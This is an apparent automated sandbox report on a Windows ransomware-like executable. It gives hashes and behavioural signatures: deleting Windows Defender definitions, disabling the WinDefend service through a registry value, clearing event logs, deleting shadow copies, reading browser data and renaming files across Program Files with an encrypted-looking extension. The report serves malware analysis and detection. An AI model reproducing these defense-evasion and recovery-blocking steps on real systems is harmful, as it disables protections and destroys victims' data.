Resubmissions
13-01-2022 14:14
220113-rj8ymsagb4 1013-01-2022 11:04
220113-m6crhahfgj 1013-01-2022 10:58
220113-m3a4hahef9 10Analysis
-
max time kernel
61s -
max time network
156s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 11:04
Static task
static1
Behavioral task
behavioral1
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win10-en-20211208
General
-
Target
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
-
Size
2.5MB
-
MD5
8fdfa1997b566f6e086c29e33935dcc5
-
SHA1
178fbe1c8fc1a6e3440215d668797699f94a4bef
-
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
-
SHA512
b185d1080c62f59ff26592321bf2a5cb85556260f34f59726cc9d5aeed1f82a48c710e8decd1212ddc2e4ca371ba83ad3aca6bf34587ddc73cc9c90afec467d5
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 4292 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Ws6CBxLTbs40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_K2JruS0H3fQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_8wKWajy-rrA0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_pNHacr3Xsbc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MlYmERBRnyk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\invalid32x32.gif.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_eBD8aEEB7Mo0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_PGeNiQcssP80.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_yk7D3S0XPoY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_INqwEbPi3pc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_plkOpLyaTAg0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_SPDDfPCob7I0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_PNuCQJ0fyls0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_4JdhLJLnDCU0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MOwtg_uMcDs0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Retail-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_kUnBnXJpnbY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_xX2PQ3br4KM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_SMl1u7JMklw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_nSCftRHmmnc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART12.BDR.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_cAPihrHLzl40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_r0TT6LtOwNw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\FlickLearningWizard.exe.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_RiSPKIEzKYU0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_kXpOdpzuI7I0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_mEizp4cMadE0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_cNKw_qf0ENs0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_1ArEvNlE2E80.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_RtBlita_xy80.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Trial-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_CFi9eZpZqbw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-split.avi cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_ACScJJ_f6ds0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Grace-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Dj_L17njakk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsymsl.ttf.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_LGl3-uH_uiM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_4dEjXRrpuNQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_I34Ak0ZbI-M0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_DBeYSq6_32s0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_rlQy0tLOI5o0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_KHzEKTH6Mb40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_zRMoBhpNd180.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_JmSdlk9ZeMI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_3yqDP-VjRNE0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_YITotZ8vXPI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\CASHREG.WAV.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_icQ-Iw1fzpY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\rtscom.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MF9ElsAtDMM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_-kFX3LjiTcg0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_gDi1AfmKlow0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.White@3x.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_8LtOLH_mnlk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_xy8buR5xrsw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_vdVp-Fhv3hc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_srYJQnnqZCQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_NSNFFUtZpMw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.config.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Zo6arwmkj4A0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-140.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_x9Oejgf73eQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_9zN3T-f8_8A0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_32dn4WAdokM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_NROijV3XKCk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_eYiIJ7kf_YE0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_d_WaBF4u2rw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Grace-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_V5xJ9rhRmaY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\msinfo32.exe.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_bc8croij8Do0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_2CgErdBlaFM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4976 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.execab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exepid process 3268 powershell.exe 3268 powershell.exe 3268 powershell.exe 2608 powershell.exe 2608 powershell.exe 2608 powershell.exe 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 2828 wevtutil.exe Token: SeBackupPrivilege 2828 wevtutil.exe Token: SeSecurityPrivilege 3456 wevtutil.exe Token: SeBackupPrivilege 3456 wevtutil.exe Token: SeSecurityPrivilege 364 wevtutil.exe Token: SeBackupPrivilege 364 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3408 wmic.exe Token: SeSecurityPrivilege 3408 wmic.exe Token: SeTakeOwnershipPrivilege 3408 wmic.exe Token: SeLoadDriverPrivilege 3408 wmic.exe Token: SeSystemProfilePrivilege 3408 wmic.exe Token: SeSystemtimePrivilege 3408 wmic.exe Token: SeProfSingleProcessPrivilege 3408 wmic.exe Token: SeIncBasePriorityPrivilege 3408 wmic.exe Token: SeCreatePagefilePrivilege 3408 wmic.exe Token: SeBackupPrivilege 3408 wmic.exe Token: SeRestorePrivilege 3408 wmic.exe Token: SeShutdownPrivilege 3408 wmic.exe Token: SeDebugPrivilege 3408 wmic.exe Token: SeSystemEnvironmentPrivilege 3408 wmic.exe Token: SeRemoteShutdownPrivilege 3408 wmic.exe Token: SeUndockPrivilege 3408 wmic.exe Token: SeManageVolumePrivilege 3408 wmic.exe Token: 33 3408 wmic.exe Token: 34 3408 wmic.exe Token: 35 3408 wmic.exe Token: 36 3408 wmic.exe Token: SeIncreaseQuotaPrivilege 816 wmic.exe Token: SeSecurityPrivilege 816 wmic.exe Token: SeTakeOwnershipPrivilege 816 wmic.exe Token: SeLoadDriverPrivilege 816 wmic.exe Token: SeSystemProfilePrivilege 816 wmic.exe Token: SeSystemtimePrivilege 816 wmic.exe Token: SeProfSingleProcessPrivilege 816 wmic.exe Token: SeIncBasePriorityPrivilege 816 wmic.exe Token: SeCreatePagefilePrivilege 816 wmic.exe Token: SeBackupPrivilege 816 wmic.exe Token: SeRestorePrivilege 816 wmic.exe Token: SeShutdownPrivilege 816 wmic.exe Token: SeDebugPrivilege 816 wmic.exe Token: SeSystemEnvironmentPrivilege 816 wmic.exe Token: SeRemoteShutdownPrivilege 816 wmic.exe Token: SeUndockPrivilege 816 wmic.exe Token: SeManageVolumePrivilege 816 wmic.exe Token: 33 816 wmic.exe Token: 34 816 wmic.exe Token: 35 816 wmic.exe Token: 36 816 wmic.exe Token: SeIncreaseQuotaPrivilege 816 wmic.exe Token: SeSecurityPrivilege 816 wmic.exe Token: SeTakeOwnershipPrivilege 816 wmic.exe Token: SeLoadDriverPrivilege 816 wmic.exe Token: SeSystemProfilePrivilege 816 wmic.exe Token: SeSystemtimePrivilege 816 wmic.exe Token: SeProfSingleProcessPrivilege 816 wmic.exe Token: SeIncBasePriorityPrivilege 816 wmic.exe Token: SeCreatePagefilePrivilege 816 wmic.exe Token: SeBackupPrivilege 816 wmic.exe Token: SeRestorePrivilege 816 wmic.exe Token: SeShutdownPrivilege 816 wmic.exe Token: SeDebugPrivilege 816 wmic.exe Token: SeSystemEnvironmentPrivilege 816 wmic.exe Token: SeRemoteShutdownPrivilege 816 wmic.exe Token: SeUndockPrivilege 816 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3328 wrote to memory of 3952 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 3952 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 3952 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3952 wrote to memory of 3456 3952 net.exe net1.exe PID 3952 wrote to memory of 3456 3952 net.exe net1.exe PID 3952 wrote to memory of 3456 3952 net.exe net1.exe PID 3328 wrote to memory of 1984 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 1984 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 1984 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 1984 wrote to memory of 1632 1984 net.exe net1.exe PID 1984 wrote to memory of 1632 1984 net.exe net1.exe PID 1984 wrote to memory of 1632 1984 net.exe net1.exe PID 3328 wrote to memory of 64 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 64 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 64 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 64 wrote to memory of 4196 64 net.exe net1.exe PID 64 wrote to memory of 4196 64 net.exe net1.exe PID 64 wrote to memory of 4196 64 net.exe net1.exe PID 3328 wrote to memory of 4204 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 4204 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 4204 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 4204 wrote to memory of 788 4204 net.exe net1.exe PID 4204 wrote to memory of 788 4204 net.exe net1.exe PID 4204 wrote to memory of 788 4204 net.exe net1.exe PID 3328 wrote to memory of 4340 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 4340 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 4340 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe 